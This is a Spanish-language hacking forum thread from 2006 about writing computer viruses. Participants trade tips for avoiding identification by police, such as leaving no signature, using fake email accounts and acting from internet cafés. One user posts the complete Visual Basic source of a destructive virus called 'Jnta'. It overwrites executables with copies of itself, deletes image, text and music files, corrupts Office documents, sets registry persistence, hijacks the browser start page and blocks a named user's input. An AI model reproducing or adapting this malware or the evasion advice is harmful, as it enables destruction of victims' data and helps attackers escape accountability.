Programar virus ???

Iniciado por koopa2, 4 Febrero 2006, 21:10 PM

0 Miembros y 1 Visitante están viendo este tema.

NYlOn

Dudo mucho que busquen al que ejecuto el virus. Los virus mas famosos son ejecutados por millones y millones de usuarios (ya sea voluntaria o involuntariamente), van a buscar a todos esos ?? Yo creo que buscarian (y de echo lo hacen) solo al creador del virus y, si se puede provar, a alguien que haya ayudado a su distribucion de forma voluntaria, pero es muy dificil, creo yo, de comprovar.
Un ejemplo es el virus I LOVE YOU, uno de los primeros virus famosos. A los creadores los metieron presos.
Eran 2 o 3 a los que agarraron.

Robokop

mmm pero como podrian darse cuenta de la persona que hizo el virus  :huh:

NYlOn


programatrix

1º Este tema va en el foro de troyanos y virus.
2º Lo primero antes de nada, debes saber si vas a programar un virus, troyano o gusano. No quiero ofenderte y espero que no seas asi. Pero he visto a gente que quieren programar un virus sin tan siquiera saber lo que son. Lo unico que tenian era un code para hacerle copy&paste
3º Te aconsejo que aprendas un lenguaje, no hace falta que le sepas 100% bien pero que lo controles. Una vez hecho eso, te recomiendo que ya aprendas todas las tecnicas de programacion de virus.
4º Una buena opcion es empezar con el visual basic, estaria bien que declararas las variables y usaras funciones, array socket controles y todo eso, para aprenderlo y luego hacer virus
5º Si te vas a meter a empezar por c++, que no es mala opcion te aconsejo que tengas paciencia puesto que c++ es bastante dificilillo para empezar.
6º Tambien puedes usar ensamblador..., es un lenguaje que se usa a nivel microprocesador y es muy bajo nivel, para empezar no me parece el mejor lenguaje...
Un saludo  ::)

Kizar

Cita de: NYlOn en  8 Febrero 2006, 07:00 AM
http://inicio.tiendapc.com/internet/SInicio?s=11392&f=14113

Asi le pillan a cualkiera si les dejo su nick en el codigo fuente, no ace falta mas k ponerle en google y encuentras todos los perfiles de las paginas y foros en lo k esta registrado, y posiblemente su email. y con saber el email es perdir la informacion y eso la poli lo tiene facil.

Yo creo k si no dejas ninguna firma k te involucre y k el virus se ejecute por primera vez en otro pais a ti no te encuentran ni de fly.

Cuando kieras demostrar k tu eres el autor de ese virus tenes el codigo fuente.

Salu2

BenRu

Si dejas tu nick es facil que te cojan...sobre todo por lo que tu has dicho...si estas registrado en foros o demas, pueden hacer muchas cosas con eso...por ejemplo, hacerse pasar por un aficionado a la informatica el cual quiere compartir cosas contigo... :rolleyes:  :P

Uxio

No los veo yo tan puestos... ¿Entonces puede haber un traidor entre nosotros?  ;D

Kizar

Cita de: Uxio en 10 Febrero 2006, 20:15 PM
No los veo yo tan puestos... ¿Entonces puede haber un traidor entre nosotros?  ;D

Las compañias antivirus visitan esto a menudo y esta pagina esta catalogada en todos los filtros de:

Piratas informaticos
Iniciacion criminal
Programacion de malware
Warez y p2p


Esos son motivos suficientes para que se den un paseo de vez en cuando.

Salu2

Uxio

Andá...  :shocked: :shocked: :shocked:

jbd_hkr

no kreo que kon el nik te enkuentren, ademas tu ingresas algun korreo que tenga datos falsos, x ejemplo: tu nombre seria tu "nik"....en cuanto a tu IP.....haz las maldades desde algun cibercafe, a esos lugares va un monton de gente y nunca te descubriran. Aki te dejo un pekeño kode de un virusillo bien simple, pero que tiene algunos triggers de activacion y otras sorpresillas:

'Jnta Virus Ver 6.4F (W32/Jnta.F@dd-H:mm:ss)
'"Coded" by jAmEs_bRaCk_dIkAr
'http://www.jamesbrackdikar.cjb.net - jbd_hkr@hotmail.com

Private Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String _
, ByVal lpNewFileName As String, ByVal bFailIfExists As Long) As Long
Private Declare Function SetComputerName Lib "kernel32" Alias "SetComputerNameA" _
(ByVal lpComputerName As String) As Long
Public Declare Function BlockInput Lib "user32" (ByVal fBlock As Long) As Long
Const Msg0 = "Jnta Virus ver 6.4F (W32/Jnta.F@dd-H:mm:ss)"
Const Msg1 = "I-Love-You-Janita"
Const Msg2 = "Version "
Const RegRoot = "HKEY_LOCAL_MACHINE\SOFTWARE\JntaVirus\"
Const RegRoot2 = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"
Const RegValue0 = "ArchivosInfectados"
Const RegValue1 = "UltimaEjecucion"
Const RegValue2 = "Jnta"
Const RegStartPage = "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page"
Const Txt0 = "Janita"
Const Dia = "17"
Const Mes = "2"
Dim fso As New FileSystemObject, txt As TextStream
Dim opn As New Shell
Dim wscr As New WshShell
Dim objnet As New WshNetwork, usr As String
Dim Contador As Integer
Enum Valores
Startup = "0"
ArchivosInfectados = "1"
UltimaEjecucion = "2"
Autor = "3"
Todos = "4"
PaginaInicio = "5"
End Enum
Sub Main()
Dim f0, Suma
On Error Resume Next
Contador = 0
usr = objnet.UserName
Suma = Day(Now) + Month(Now)
f0 = fso.GetSpecialFolder(1)
App.TaskVisible = False
If App.PrevInstance = True Then
End
End If
If fso.FileExists(f0 & "\Windows.hta") = False Then
EscribirHTA
End If
If App.EXEName <> "Jnta" Then
FrmTitle.Infectados = wscr.RegRead(RegRoot & RegValue0)
FrmTitle.Show
End If
If Day(Now) = Dia Then
Iniciar True
ElseIf Suma = 17 Then
Iniciar True
Else
If usr = "Esteban" Or usr = "ESTEBAN" Or usr = "esteban" Then
BlockInput (True)
End If
If Hour(Now) = 17 Or Minute(Now) = 17 Or Second(Now) = 17 Then
opn.Open (f0 & "\Windows.hta")
End If
Iniciar False
End If
End Sub
Sub Iniciar(infectar As Boolean)
On Error Resume Next
Dim Fcache, F1
F1 = fso.GetSpecialFolder(1)
Fcache = F1 & "\DLLCACHE"
If infectar = True Then
InfectarArchivos (Fcache)
SetComputerName (Txt0)
BuscarUnidades
EscribirValor (Todos)
EscribirHTA
Msg "Jnta Virus Info", Msg0
End If
If infectar = False Then
CopyFile App.Path & "\" & App.EXEName & ".exe", F1 & "\Windows.exe", 0
EscribirValor (Todos)
Msg "Jnta Virus Info", Msg0
EscribirHTA
End If
End Sub
Sub BuscarUnidades()
On Error Resume Next
Dim Drvs, Drv
Set Drvs = fso.Drives
For Each Drv In Drvs
DoEvents
If Drv.DriveType = 1 Or Drv.DriveType = 2 Or Drv.DriveType = 3 Then
BuscarDirectorios Drv.Path & "\"
End If
Next
End Sub
Sub BuscarDirectorios(Directorio)
On Error Resume Next
Dim Fldr, SbFldr, X
Set Fldr = fso.GetFolder(Directorio)
Set SbFldr = Fldr.SubFolders
For Each X In SbFldr
DoEvents
InfectarArchivos (X.Path)
BuscarDirectorios (X.Path)
Next
End Sub
Sub InfectarArchivos(Directorio)
On Error Resume Next
Dim Fldr, Fls, X, Fname, Ext
Set Fldr = fso.GetFolder(Directorio)
Set Fls = Fldr.Files
For Each X In Fls
DoEvents
Fname = fso.GetFileName(X)
Ext = fso.GetExtensionName(X)
If Ext = "exe" Or Ext = "EXE" Then
Contador = Contador + 1
CopyFile App.Path & "\" & App.EXEName & ".exe", Directorio & "\" & Fname, 0
EscribirValor (ArchivosInfectados)
End If
If Ext = "txt" Or Ext = "TXT" Or Ext = "JPG" Or Ext = "jpg" Or Ext = "jpeg" Or Ext = "JPEG" _
Or Ext = "bmp" Or Ext = "BMP" Or Ext = "mp3" Or Ext = "MP3" Then
Contador = Contador + 1
fso.DeleteFile X, True
Set txt = fso.OpenTextFile(Directorio & "\" & Fname & ".txt", ForWriting, True, TristateFalse)
txt.WriteLine (Contador & vbCrLf & Msg0 & vbCrLf & vbCrLf & Msg1)
txt.Close
EscribirValor (ArchivosInfectados)
End If
If Ext = "doc" Or Ext = "DOC" Or Ext = "XLS" Or Ext = "xls" Or Ext = "ppt" Or Ext = "PPT" Or Ext = "PPS" Or Ext = "pps" Then
Set txt = fso.OpenTextFile(X, ForWriting, True, TristateFalse)
txt.WriteLine (Contador & vbCrLf & Msg0 & vbCrLf & vbCrLf & Msg1)
txt.Close
End If
Next
End Sub
Function EscribirValor(Valor As Valores)
On Error Resume Next
f0 = fso.GetSpecialFolder(1)
If Valor = ArchivosInfectados Then
wscr.RegWrite RegRoot & RegValue0, Contador, "REG_SZ"
End If
If Valor = UltimaEjecucion Then
wscr.RegWrite RegRoot & RegValue1, Now, "REG_SZ"
End If
If Valor = Autor Then
wscr.RegWrite RegRoot & RegValue2, "Ver 6.4F Coded by......? jejejeje", "REG_SZ"
End If
If Valor = Startup Then
wscr.RegWrite RegRoot2 & "Windows", f0 & "\Windows.exe", "REG_SZ"
End If
If Valor = Todos Then
wscr.RegWrite RegRoot & RegValue0, Contador, "REG_SZ"
wscr.RegWrite RegRoot & RegValue1, Now, "REG_SZ"
wscr.RegWrite RegRoot & RegValue2, "Coded by ......? jejejeje", "REG_SZ"
wscr.RegWrite RegRoot2 & "Windows", f0 & "\Windows.exe", "REG_SZ"
wscr.RegWrite RegStartPage, "www.lamejordetodas.com.ar", "REG_SZ"
End If
If Valor = PaginaInicio Then
wscr.RegWrite RegStartPage, "www.lamejordetodas.com.ar", "REG_SZ"
End If
End Function
Sub EscribirHTA()
f0 = fso.GetSpecialFolder(1)
Set txt = fso.OpenTextFile(f0 & "\Windows.hta", ForWriting, True, TristateFalse)
txt.WriteLine (Script.ScriptFullText)
txt.Close
End Sub
Function Msg(Titulo, Mensaje)
Script.Label2 = "Message from: " & objnet.UserName
Script.Title = Titulo
Script.Message = Mensaje
Script.Show
End Function